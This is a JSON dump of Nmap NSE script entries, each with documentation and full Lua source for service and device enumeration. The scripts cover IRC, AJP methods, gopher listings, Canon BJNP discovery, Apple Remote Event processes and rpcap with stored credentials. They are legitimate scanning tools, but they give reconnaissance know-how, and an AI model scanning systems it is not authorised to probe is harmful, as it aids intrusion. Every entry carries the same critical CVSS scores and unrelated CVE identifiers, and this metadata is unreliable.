status, resp = helper:connect()\n if ( not(status) ) then\n return false, \"Failed to connect to server\"\n end\n status, resp = helper:login(username, password)\n\n if ( not(status) ) then\n return false, resp\n end\n\n status, resp = helper:findAllInterfaces()\n helper:close()\n if ( not(status) ) then\n return false, resp\n end\n\n port.version.name = \"rpcap\"\n port.version.product = \"WinPcap remote packet capture daemon\"\n nmap.set_port_version(host, port)\n\n return true, resp\nend\n\naction = function(host, port)\n\n -- patch-up the service name, so creds.rpcap will work, ugly but needed as\n -- tcp 2002 is registered to the globe service in nmap-services ...\n port.service = \"rpcap\"\n\n local c = creds.Credentials:new(creds.ALL_DATA, host, port)\n local states = creds.State.VALID + creds.State.PARAM\n local status, resp = getInfo(host, port)\n\n if ( status ) then\n return stdnse.format_output(true, resp)\n end\n\n for cred in c:getCredentials(states) do\n status, resp = getInfo(host, port, cred.user, cred.pass)\n if ( status ) then\n return stdnse.format_output(true, resp)\n end\n end\n\n return fail(resp)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:41:25", "description": "Gathers information from an IRC server. \n\nIt uses STATS, LUSERS, and other queries to obtain this information.\n\n## Example Usage \n \n \n nmap -sV -sC <target>\n\n## Script Output \n \n \n 6665/tcp open irc\n | irc-info:\n | server: asimov.freenode.net\n | version: ircd-seven-1.1.3(20111112-b71671d1e846,charybdis-3.4-dev). asimov.freenode.net\n | servers: 31\n | ops: 36\n | chans: 48636\n | users: 84883\n | lservers: 1\n | lusers: 4350\n | uptime: 511 days, 23:02:29\n | source host: source.example.com\n |_ source ident: NONE or BLOCKED\n\n## Requires \n\n * [comm](<../lib/comm.html>)\n * [nmap](<../lib/nmap.html>)\n * [math](<>)\n * [irc](<../lib/irc.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [rand](<../lib/rand.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2008-11-06T02:52:59", "type": "nmap", "title": "irc-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-09-08T17:07:06", "id": "NMAP:IRC-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/irc-info.html", "sourceData": "local comm = require \"comm\"\nlocal nmap = require \"nmap\"\nlocal math = require \"math\"\nlocal irc = require \"irc\"\nlocal stdnse = require \"stdnse\"\nlocal rand = require \"rand\"\n\ndescription = [[\nGathers information from an IRC server.\n\nIt uses STATS, LUSERS, and other queries to obtain this information.\n]]\n\n---\n-- @output\n-- 6665/tcp open irc\n-- | irc-info:\n-- | server: asimov.freenode.net\n-- | version: ircd-seven-1.1.3(20111112-b71671d1e846,charybdis-3.4-dev). asimov.freenode.net\n-- | servers: 31\n-- | ops: 36\n-- | chans: 48636\n-- | users: 84883\n-- | lservers: 1\n-- | lusers: 4350\n-- | uptime: 511 days, 23:02:29\n-- | source host: source.example.com\n-- |_ source ident: NONE or BLOCKED\n--@xmloutput\n-- <elem key=\"server\">asimov.freenode.net</elem>\n-- <elem key=\"version\">ircd-seven-1.1.3(20111112-b71671d1e846,charybdis-3.4-dev). asimov.freenode.net </elem>\n-- <elem key=\"servers\">31</elem>\n-- <elem key=\"ops\">36</elem>\n-- <elem key=\"chans\">48636</elem>\n-- <elem key=\"users\">84883</elem>\n-- <elem key=\"lservers\">1</elem>\n-- <elem key=\"lusers\">4350</elem>\n-- <elem key=\"uptime\">511 days, 23:02:29</elem>\n-- <elem key=\"source host\">source.example.com</elem>\n-- <elem key=\"source ident\">NONE or BLOCKED</elem>\n\nauthor = {\"Doug Hoyte\", \"Patrick Donnelly\"}\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"default\", \"discovery\", \"safe\"}\n\nportrule = irc.portrule\n\nlocal banner_timeout = 60\n\nfunction action (host, port)\n local nick = rand.random_alpha(9)\n\n local output = stdnse.output_table()\n\n local sd, line = comm.tryssl(host, port,\n (\"USER nmap +iw nmap :Nmap Wuz Here\\nNICK %s\\n\"):format(nick),\n {request_timeout=6000})\n if not sd then return \"Unable to open connection\" end\n\n local buf = stdnse.make_buffer(sd, \"\\r?\\n\")\n\n while line do\n stdnse.debug2(\"%s\", line)\n\n -- This one lets us know we've connected, pre-PONGed, and got a NICK\n -- Start of MOTD, we'll take the server name from here\n local info = line:match \"^:([%w-_.]+) 375\"\n if info then\n output.server = info\n sd:send(\"LUSERS\\nVERSION\\nSTATS u\\nWHO \" .. nick .. \"\\nQUIT\\n\")\n end\n\n -- MOTD could be missing, we want to handle that scenario as well\n info = line:match \"^:([%w-_.]+) 422\"\n if info then\n output.server = info\n sd:send(\"LUSERS\\nVERSION\\nSTATS u\\nWHO \" .. nick .. \"\\nQUIT\\n\")\n end\n\n -- NICK already in use\n info = line:match \"^:([%w-_.]+) 433\"\n if info then\n nick = rand.random_alpha(9)\n sd:send(\"NICK \" .. nick .. \"\\n\")\n end\n\n -- PING/PONG\n local dummy = line:match \"^PING :(.*)\"\n if dummy then\n sd:send(\"PONG :\" .. dummy .. \"\\n\")\n end\n\n -- Server version info\n info = line:match \"^:[%w-_.]+ 351 %w+ ([^:]+)\"\n if info then\n output.version = info\n end\n\n -- Various bits of info\n local users, invisible, servers = line:match \"^:[%w-_.]+ 251 %w+ :There are (%d+) users and (%d+) invisible on (%d+) servers\"\n if users then\n output.users = math.tointeger(users + invisible)\n output.servers = servers\n end\n\n local users, servers = line:match \"^:[%w-_.]+ 251 %w+ :There are (%d+) users and %d+ services on (%d+) servers\"\n if users then\n output.users = users\n output.servers = servers\n end\n\n info = line:match \"^:[%w-_.]+ 252 %w+ (%d+) :\"\n if info then\n output.ops = info\n end\n\n info = line:match \"^:[%w-_.]+ 254 %w+ (%d+) :\"\n if info then\n output.chans = info\n end\n\n -- efnet\n local clients, servers = line:match \"^:[%w-_.]+ 255 %w+ :I have (%d+) clients and (%d+) server\"\n if clients then\n output.lusers = clients\n output.lservers = servers\n end\n\n -- ircnet\n local clients, servers = line:match \"^:[%w-_.]+ 255 %w+ :I have (%d+) users, %d+ services and (%d+) server\"\n if clients then\n output.lusers = clients\n output.lservers = servers\n end\n\n local uptime = line:match \"^:[%w-_.]+ 242 %w+ :Server Up (%d+ days, [%d:]+)\"\n if uptime then\n output.uptime = uptime\n end\n\n local ident, host = line:match \"^:[%w-_.]+ 352 %w+ %S+ (%S+) ([%w-_.]+)\"\n if ident then\n if ident:find \"^~\" then\n output[\"source ident\"] = \"NONE or BLOCKED\"\n else\n output[\"source ident\"] = ident\n end\n output[\"source host\"] = host\n end\n\n local err = line:match \"^ERROR :(.*)\"\n if err then\n output.error = err\n end\n\n line = buf()\n end\n\n if output.server then\n return output\n else\n return nil\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:47:33", "description": "Discovers which options are supported by the AJP (Apache JServ Protocol) server by sending an OPTIONS request and lists potentially risky methods. \n\nIn this script, \"potentially risky\" methods are anything except GET, HEAD, POST, and OPTIONS. If the script reports potentially risky methods, they may not all be security risks, but you should check to make sure. This page lists the dangers of some common methods: \n\n<http://www.owasp.org/index.php/Testing_for_HTTP_Methods_and_XST_%28OWASP-CM-008%29>\n\n## Script Arguments \n\n#### ajp-methods.path \n\nthe path to check or <code>/<code> if none was given\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p 8009 <ip> --script ajp-methods\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 8009/tcp open ajp13\n | ajp-methods:\n | Supported methods: GET HEAD POST PUT DELETE TRACE OPTIONS\n | Potentially risky methods: PUT DELETE TRACE\n |_ See https://nmap.org/nsedoc/scripts/ajp-methods.html\n \n\n## Requires \n\n * [ajp](<../lib/ajp.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [stringaux](<../lib/stringaux.html>)\n * [table](<>)\n * [tableaux](<../lib/tableaux.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-05-07T18:49:22", "type": "nmap", "title": "ajp-methods NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-11-06T15:07:01", "id": "NMAP:AJP-METHODS.NSE", "href": "https://nmap.org/nsedoc/scripts/ajp-methods.html", "sourceData": "local ajp = require \"ajp\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal stringaux = require \"stringaux\"\nlocal table = require \"table\"\nlocal tableaux = require \"tableaux\"\n\ndescription = [[\nDiscovers which options are supported by the AJP (Apache JServ\nProtocol) server by sending an OPTIONS request and lists potentially\nrisky methods.\n\nIn this script, \"potentially risky\" methods are anything except GET,\nHEAD, POST, and OPTIONS. If the script reports potentially risky\nmethods, they may not all be security risks, but you should check to\nmake sure. This page lists the dangers of some common methods:\n\nhttp://www.owasp.org/index.php/Testing_for_HTTP_Methods_and_XST_%28OWASP-CM-008%29\n]]\n\n---\n-- @usage\n-- nmap -p 8009 <ip> --script ajp-methods\n--\n-- @output\n-- PORT STATE SERVICE\n-- 8009/tcp open ajp13\n-- | ajp-methods:\n-- | Supported methods: GET HEAD POST PUT DELETE TRACE OPTIONS\n-- | Potentially risky methods: PUT DELETE TRACE\n-- |_ See https://nmap.org/nsedoc/scripts/ajp-methods.html\n--\n-- @args ajp-methods.path the path to check or <code>/<code> if none was given\n--\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"default\", \"safe\"}\n\n\nportrule = shortport.port_or_service(8009, 'ajp13', 'tcp')\n\nlocal arg_url = stdnse.get_script_args(SCRIPT_NAME .. \".path\") or \"/\"\nlocal UNINTERESTING_METHODS = { \"GET\", \"HEAD\", \"POST\", \"OPTIONS\" }\n\nlocal function filter_out(t, filter)\n local result = {}\n for _, e in ipairs(t) do\n if ( not(tableaux.contains(filter, e)) ) then\n result[#result + 1] = e\n end\n end\n return result\nend\n\naction = function(host, port)\n\n local helper = ajp.Helper:new(host, port)\n if ( not(helper:connect()) ) then\n return stdnse.format_output(false, \"Failed to connect to server\")\n end\n\n local status, response = helper:options(arg_url)\n helper:close()\n if ( not(status) or response.status ~= 200 or\n not(response.headers) or not(response.headers['allow']) ) then\n return \"Failed to get a valid response for the OPTION request\"\n end\n\n local methods = stringaux.strsplit(\",%s\", response.headers['allow'])\n\n local output = {}\n table.insert(output, (\"Supported methods: %s\"):format(table.concat(methods, \" \")))\n\n local interesting = filter_out(methods, UNINTERESTING_METHODS)\n if ( #interesting > 0 ) then\n table.insert(output, \"Potentially risky methods: \" .. table.concat(interesting, \" \"))\n table.insert(output, \"See https://nmap.org/nsedoc/scripts/ajp-methods.html\")\n end\n return stdnse.format_output(true, output)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:45:02", "description": "Lists files and directories at the root of a gopher service.\n\n## Script Arguments \n\n#### gopher-ls.maxfiles \n\nIf set, limits the amount of files returned by the script. If set to 0 or less, all files are shown. The default value is 10.\n\n## Example Usage \n \n \n nmap -p 70 --script gopher-ls --script-args gopher-ls.maxfiles=100 <target>\n \n\n## Script Output \n \n \n 70/tcp open gopher\n | gopher-ls:\n | [txt] /gresearch.txt \"Gopher, the next big thing?\"\n | [dir] /taxf \"Tax Forms\"\n |_Only 2 shown. Use --script-args gopher-ls.maxfiles=-1 to see all.\n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [stringaux](<../lib/stringaux.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-12-29T18:46:16", "type": "nmap", "title": "gopher-ls NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:GOPHER-LS.NSE", "href": "https://nmap.org/nsedoc/scripts/gopher-ls.html", "sourceData": "local nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal stringaux = require \"stringaux\"\nlocal table = require \"table\"\n\ndescription = [[\nLists files and directories at the root of a gopher service.\n]]\n\n---\n-- @usage\n-- nmap -p 70 --script gopher-ls --script-args gopher-ls.maxfiles=100 <target>\n--\n-- @output\n-- 70/tcp open gopher\n-- | gopher-ls:\n-- | [txt] /gresearch.txt \"Gopher, the next big thing?\"\n-- | [dir] /taxf \"Tax Forms\"\n-- |_Only 2 shown. Use --script-args gopher-ls.maxfiles=-1 to see all.\n--\n-- @args gopher-ls.maxfiles If set, limits the amount of files returned by\n-- the script. If set to 0 or less, all files are shown. The default\n-- value is 10.\n\n\nauthor = \"Toni Ruottu\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"default\", \"discovery\", \"safe\"}\n\n\nportrule = shortport.port_or_service (70, \"gopher\", {\"tcp\"})\n\nlocal function typelabel(gtype)\n if gtype == \"0\" then\n return \"[txt]\"\n end\n if gtype == \"1\" then\n return \"[dir]\"\n end\n return string.format(\"[%s]\", gtype)\n\nend\n\naction = function( host, port )\n\n local INFO = \"i\"\n local maxfiles = stdnse.get_script_args(SCRIPT_NAME..\".maxfiles\")\n if not maxfiles then\n maxfiles = 10\n else\n maxfiles = tonumber(maxfiles)\n end\n if maxfiles < 1 then\n maxfiles = nil\n end\n\n local socket = nmap.new_socket()\n local status, err = socket:connect(host, port)\n if not status then\n return\n end\n\n socket:send(\"\\r\\n\")\n\n local buffer, _ = stdnse.make_buffer(socket, \"\\r\\n\")\n local line = buffer()\n local files = {}\n\n while line ~= nil do\n if #line > 1 then\n local gtype = string.sub(line, 1, 1)\n local fields = stringaux.strsplit(\"\\t\", string.sub(line, 2))\n if #fields > 1 then\n local label = fields[1]\n local filename = fields[2]\n if gtype ~= INFO then\n if maxfiles and #files >= maxfiles then\n table.insert(files, string.format('Only %d shown. Use --script-args %s.maxfiles=-1 to see all.', maxfiles, SCRIPT_NAME))\n break\n else\n table.insert(files, string.format('%s %s \"%s\"', typelabel(gtype), filename, label))\n end\n end\n end\n end\n line = buffer()\n end\n return \"\\n\" .. table.concat(files, \"\\n\")\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:47:12", "description": "Attempts to discover Canon devices (Printers/Scanners) supporting the BJNP protocol by sending BJNP Discover requests to the network broadcast address for both ports associated with the protocol. \n\nThe script then attempts to retrieve the model, version and some additional information for all discovered devices.\n\n## Script Arguments \n\n#### broadcast-bjnp-discover.timeout \n\nspecifies the amount of seconds to sniff the network interface. (default 30s)\n\n## Example Usage \n \n \n nmap --script broadcast-bjnp-discover\n \n\n## Script Output \n \n \n | broadcast-bjnp-discover:\n | 192.168.0.10\n | Printer\n | Manufacturer: Canon\n | Model: MG5200 series\n | Description: Canon MG5200 series\n | Firmware version: 1.050\n | Command: BJL,BJRaster3,BSCCe,NCCe,IVEC,IVECPLI\n | Scanner\n | Manufacturer: Canon\n | Model: MG5200 series\n | Description: Canon MG5200 series\n |_ Command: MultiPass 2.1,IVEC\n \n\n## Requires \n\n * [bjnp](<../lib/bjnp.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [coroutine](<>)\n * [nmap](<../lib/nmap.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-08-05T18:55:40", "type": "nmap", "title": "broadcast-bjnp-discover NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:BROADCAST-BJNP-DISCOVER.NSE", "href": "https://nmap.org/nsedoc/scripts/broadcast-bjnp-discover.html", "sourceData": "description = [[\nAttempts to discover Canon devices (Printers/Scanners) supporting the\nBJNP protocol by sending BJNP Discover requests to the network\nbroadcast address for both ports associated with the protocol.\n\nThe script then attempts to retrieve the model, version and some additional\ninformation for all discovered devices.\n]]\n\n---\n-- @usage\n-- nmap --script broadcast-bjnp-discover\n--\n-- @output\n-- | broadcast-bjnp-discover:\n-- | 192.168.0.10\n-- | Printer\n-- | Manufacturer: Canon\n-- | Model: MG5200 series\n-- | Description: Canon MG5200 series\n-- | Firmware version: 1.050\n-- | Command: BJL,BJRaster3,BSCCe,NCCe,IVEC,IVECPLI\n-- | Scanner\n-- | Manufacturer: Canon\n-- | Model: MG5200 series\n-- | Description: Canon MG5200 series\n-- |_ Command: MultiPass 2.1,IVEC\n--\n-- @args broadcast-bjnp-discover.timeout specifies the amount of seconds to sniff\n-- the network interface. (default 30s)\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"safe\", \"broadcast\"}\n\nlocal bjnp = require(\"bjnp\")\nlocal stdnse = require(\"stdnse\")\nlocal coroutine = require(\"coroutine\")\nlocal nmap = require(\"nmap\")\nlocal table = require(\"table\")\n\nlocal printer_port = { number = 8611, protocol = \"udp\"}\nlocal scanner_port = { number = 8612, protocol = \"udp\"}\nlocal arg_timeout = stdnse.parse_timespec(stdnse.get_script_args(SCRIPT_NAME .. \".timeout\"))\n\nprerule = function()\n if ( nmap.address_family() ~= 'inet' ) then\n stdnse.debug1(\"is IPv4 compatible only.\")\n return false\n end\n return true\nend\n\nlocal function identifyDevices(devices, devtype)\n local result\n local port = ( \"printers\" == devtype and printer_port or scanner_port )\n for _, ip in ipairs(devices or {}) do\n local helper = bjnp.Helper:new({ ip = ip }, port)\n if ( helper:connect() ) then\n local status, attrs\n if ( \"printers\" == devtype ) then\n status, attrs = helper:getPrinterIdentity()\n end\n if ( \"scanners\" == devtype ) then\n status, attrs = helper:getScannerIdentity()\n end\n if ( status ) then\n result = result or {}\n result[ip] = attrs\n end\n end\n helper:close()\n end\n return result\nend\n\nlocal function identifyScanners(scanners)\n return identifyDevices(scanners, \"scanners\")\nend\n\nlocal function identifyPrinters(printers)\n return identifyDevices(printers, \"printers\")\nend\n\nlocal function getKeys(devices)\n local dupes = {}\n local function iter()\n for k, _ in pairs(devices) do\n for k2, _ in pairs(devices[k]) do\n if ( not(dupes[k2]) ) then\n dupes[k2] = true\n coroutine.yield(k2)\n end\n end\n end\n coroutine.yield(nil)\n end\n return coroutine.wrap(iter)\nend\n\nlocal function getPrinters(devices)\n local condvar = nmap.condvar(devices)\n local helper = bjnp.Helper:new( { ip = \"255.255.255.255\" }, printer_port, { bcast = true, timeout = arg_timeout } )\n if ( not(helper:connect()) ) then\n condvar \"signal\"\n return\n end\n local status, printers = helper:discoverPrinter()\n helper:close()\n if ( status ) then\n devices[\"printers\"] = identifyPrinters(printers)\n end\n condvar \"signal\"\nend\n\nlocal function getScanners(devices)\n local condvar = nmap.condvar(devices)\n local helper = bjnp.Helper:new( { ip = \"255.255.255.255\" }, scanner_port, { bcast = true, timeout = arg_timeout } )\n if ( not(helper:connect()) ) then\n condvar \"signal\"\n return\n end\n local status, scanners = helper:discoverScanner()\n helper:close()\n if ( status ) then\n devices[\"scanners\"] = identifyScanners(scanners)\n end\n condvar \"signal\"\nend\n\n\naction = function()\n arg_timeout = ( arg_timeout and arg_timeout * 1000 or 5000)\n local devices, result, threads = {}, {}, {}\n local condvar = nmap.condvar(devices)\n\n local co = stdnse.new_thread(getPrinters, devices)\n threads[co] = true\n\n co = stdnse.new_thread(getScanners, devices)\n threads[co] = true\n\n while(next(threads)) do\n for t in pairs(threads) do\n threads[t] = ( coroutine.status(t) ~= \"dead\" ) and true or nil\n end\n if ( next(threads) ) then\n condvar \"wait\"\n end\n end\n\n for ip in getKeys(devices) do\n local result_part = {}\n local printer = ( devices[\"printers\"] and devices[\"printers\"][ip] )\n local scanner = ( devices[\"scanners\"] and devices[\"scanners\"][ip] )\n\n if ( printer ) then\n printer.name = \"Printer\"\n table.insert(result_part, printer)\n end\n if ( scanner ) then\n scanner.name = \"Scanner\"\n table.insert(result_part, scanner)\n end\n if ( #result_part > 0 ) then\n result_part.name = ip\n table.insert(result, result_part)\n end\n end\n\n if ( result ) then\n return stdnse.format_output(true, result)\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:45:27", "description": "Attempts to enumerate process info over the Apple Remote Event protocol. When accessing an application over the Apple Remote Event protocol the service responds with the uid and pid of the application, if it is running, prior to requesting authentication.\n\n## Example Usage \n \n \n nmap -p 3031 <ip> --script eppc-enum-processes\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 3031/tcp open eppc\n | eppc-enum-processes:\n | application uid pid\n | Address Book 501 269\n | Facetime 501 495\n | Finder 501 274\n | iPhoto 501 267\n | Photo booth 501 471\n | Remote Buddy 501 268\n | Safari 501 270\n | Terminal 501 266\n | Transmission 501 265\n |_VLC media player 501 367\n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [tab](<../lib/tab.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-05-29T18:25:49", "type": "nmap", "title": "eppc-enum-processes NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-09-01T18:50:19", "id": "NMAP:EPPC-ENUM-PROCESSES.NSE", "href": "https://nmap.org/nsedoc/scripts/eppc-enum-processes.html", "sourceData": "local nmap = require('nmap')\nlocal shortport = require('shortport')\nlocal stdnse = require('stdnse')\nlocal string = require('string')\nlocal tab = require('tab')\n\ndescription = [[\nAttempts to enumerate process info over the Apple Remote Event protocol.\nWhen accessing an application over the Apple Remote Event protocol the\nservice responds with the uid and pid of the application, if it is running,\nprior to requesting authentication.\n]]\n\n---\n-- @usage\n-- nmap -p 3031 <ip> --script eppc-enum-processes\n--\n-- @output\n-- PORT STATE SERVICE\n-- 3031/tcp open eppc\n-- | eppc-enum-processes:\n-- | application uid pid\n-- | Address Book 501 269\n-- | Facetime 501 495\n-- | Finder 501 274\n-- | iPhoto 501 267\n-- | Photo booth 501 471\n-- | Remote Buddy 501 268\n-- | Safari 501 270\n-- | Terminal 501 266\n-- | Transmission 501 265\n-- |_VLC media player 501 367\n--\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\n\nportrule = shortport.port_or_service(3031, \"eppc\", \"tcp\", \"open\")\n\naction = function( host, port )\n\n local socket = nmap.new_socket()\n socket:set_timeout(5000)\n\n local try = nmap.new_try(\n function()\n stdnse.debug1(\"failed\")\n socket:close()\n end\n )\n\n -- a list of application that may or may not be running on the target\n local apps = {\n \"Address Book\",\n \"App Store\",\n \"Facetime\",\n \"Finder\",\n \"Firefox\",\n \"Google Chrome\",\n \"iChat\",\n \"iPhoto\",\n \"Keychain Access\",\n \"iTunes\",\n \"Photo booth\",\n \"QuickTime Player\",\n \"Remote Buddy\",\n \"Safari\",\n \"Spotify\",\n \"Terminal\",\n \"TextMate\",\n \"Transmission\",\n \"VLC\",\n \"VLC media player\",\n }\n\n local results = tab.new(3)\n tab.addrow( results, \"application\", \"uid\", \"pid\" )\n\n for _, app in ipairs(apps) do\n try( socket:connect(host, port, \"tcp\") )\n local data\n\n local packets = {\n \"PPCT\\0\\0\\0\\1\\0\\0\\0\\1\",\n -- unfortunately I've found no packet specifications, so this has to do\n stdnse.fromhex(\"e44c50525401e101\")\n .. string.pack(\"Bs1\", 225 + #app, app)\n .. stdnse.fromhex(\"dfdbe302013ddfdfdfdfd500\"),\n }\n\n for _, v in ipairs(packets) do\n try( socket:send(v) )\n data = try( socket:receive() )\n end\n\n local uid, pid = data:match(\"uid=(%d+)&pid=(%d+)\")\n if ( uid and pid ) then tab.addrow( results, app, uid, pid ) end\n\n try( socket:close() )\n end\n\n return \"\\n\" .. tab.dump(results)\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:39", "description": "Extracts a list of Citrix servers from the ICA Browser service.\n\n## Example Usage \n \n \n sudo ./nmap -sU --script=citrix-enum-servers -p 1604\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 1604/udp open unknown\n | citrix-enum-servers:\n | CITRIXSRV01\n |_ CITRIXSRV02\n \n\n## Requires \n\n * 